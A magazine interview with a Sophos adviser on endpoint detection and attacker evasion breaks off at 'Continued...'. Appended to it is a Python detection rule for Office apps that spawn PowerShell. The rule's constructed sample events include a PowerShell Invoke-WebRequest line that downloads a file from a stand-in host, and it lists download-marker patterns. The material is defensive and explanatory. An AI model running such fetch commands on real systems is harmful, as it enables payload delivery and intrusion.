Managed.IT - issue56

Tricks of the trade

John Shier, senior security adviser at Sophos, answers questions about the cyber security and cyber threat landscape in 2020.

1. What kind of security incidents are today's detection systems designed to spot?

Most modern endpoint security software is designed to block both known and unknown threats using different technologies. Generally, blocking known threats is the job of traditional security software (e.g. antivirus). If we've seen the malware (or malware family) before, we can quickly convict a file with a very high degree of confidence and low false positive rate. Unknown threats today are most often caught by using machine learning (ML). ML engines are trained to recognize threats based on millions of examples of good and bad files, and the engine will make its decision based on examining millions of features (e.g. file type, size, compression etc.) to determine the probability of it being benign or malicious. ML is also incredibly powerful against threats at scale – some malware families routinely send out hundreds of unique variants daily, and ML is very effective at large-volume detection. Finally, behavioural characteristics are examined and assessed. If neither traditional nor ML-enhanced engines find enough reason to convict a threat based on how it looks, the behavioural engine can convict a threat based on how it acts. When combined with network-level detection and visibility, these systems are very effective against today's complex threats.

2. What tools and techniques are cyber attackers using to circumvent security detection systems? What kind of attack vectors are they using?

A couple of ways in which cybercriminals attempt to bypass endpoint technologies are by using obfuscation or misdirection. Obfuscation aims to hide the true nature of the file from the detection engine by encrypting or encoding the program, with some malware using multiple layers of obfuscation to frustrate analysis. Misdirection is used to fool the system into thinking it's running a benign program, which it does initially, instead of something overtly malicious.

This is frequently done by leveraging legitimate, installed applications (e.g. PowerShell) to launch additional processes and fetch malicious payloads from the internet. We have some capability in de-obfuscating malicious programs, and where it's not possible behavioural detection can be used. The most common way to circumvent a security system is to attack vulnerable software or the user. Attacking the user is usually done via phishing campaigns and/or malicious documents. It's worth noting that while most malicious documents come from phishing campaigns, not all phishing campaigns contain malicious documents. A typical phishing campaign's objective is credential theft, and malicious documents can be the vector for all sorts of malware including, but not limited to, keyloggers, credential stealers, downloaders/droppers and ransomware. Attacking vulnerable (i.e. unpatched) software is also a common tactic used by cybercriminals. They can use search tools to scan the internet for potential victims and then launch automated attacks against the vulnerable targets. Once inside, the criminals often switch to manual mode, where they use different tools to move laterally, elevate privilege and establish persistence.

3. How do cyber attackers manage to remain undetected inside victim networks for extended periods of time?

There are many reasons why an attacker may remain undetected inside a network, but for the most part lack of visibility is to blame. This can manifest itself in different ways. One way is to deliberately leave systems unprotected. We see this all too often, and without any detection software installed you will likely never see the intruder in your network. Another way is to have so much noise in your network that you don't know what good looks like and can't filter it out. We see this in large, open networks where everything can talk to everything else on any protocol.

Somewhere in the middle are the more advanced attackers who use knowledge of your environment to move around undetected. They will use your credentials, existing applications and approved systems to infiltrate your network and exfiltrate your data. To all intents and purposes, they are you.

4. So, what are defenders to do?

As always, prevention is key. Think of prevention not only in technological terms but also in terms of organisational processes. Some criminals like to infiltrate organisations by using malicious documents (maldocs). The human resources department, for one, needs to open unsolicited documents daily. How do you protect them while still allowing business to continue? One way is to use a dedicated

Continued...
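The misdirection pattern described in answer 2, where a legitimate program such as PowerShell is launched by a document and fetches a payload from the internet, is exactly what a behavioural engine has to catch when the file itself looks benign. As an added illustration, not code from the article or from Sophos, the following Python rule is run over constructed process-creation events (every image name, path and command line below is made up) and flags a document-handling application spawning a script host, raising the severity when the command line fetches content from the internet.

```python
"""Toy behavioural rule: a document application spawning a script host
that reaches out to the internet. Sample events are constructed, not
real telemetry."""
from dataclasses import dataclass, field

# Constructed process-creation events: (parent image, child image, command line).
SAMPLE_EVENTS = [
    ("winword.exe", "powershell.exe",
     "powershell.exe -Command Invoke-WebRequest https://files.example.invalid/update.bin -OutFile $env:TEMP\\u.bin"),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -File C:\\Scripts\\backup.ps1"),          # admin script, benign parent
    ("excel.exe", "powershell.exe",
     "powershell.exe Get-Date"),                               # suspicious parent, no fetch
    ("outlook.exe", "winword.exe",
     "winword.exe /n C:\\Users\\hr\\Downloads\\CV.docx"),      # normal mail-to-document chain
]

DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Substrings that indicate the script host is pulling content from the internet.
FETCH_MARKERS = ("http://", "https://", "invoke-webrequest", "downloadstring", "downloadfile")


@dataclass
class Finding:
    parent: str
    child: str
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        # Two matched conditions (spawn + fetch) is the full misdirection chain.
        return "high" if len(self.reasons) >= 2 else "medium"


def assess_event(parent: str, child: str, cmdline: str):
    """Return a Finding when a document app spawns a script host, else None.
    A network-fetch marker in the command line adds a second reason."""
    if parent.lower() not in DOCUMENT_APPS or child.lower() not in SCRIPT_HOSTS:
        return None
    finding = Finding(parent, child, ["document application spawned a script host"])
    if any(marker in cmdline.lower() for marker in FETCH_MARKERS):
        finding.reasons.append("command line fetches content from the internet")
    return finding


def scan(events):
    """Apply the rule to every event and keep only the matches."""
    return [f for f in (assess_event(*e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.parent} -> {f.child}: {'; '.join(f.reasons)}")
```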
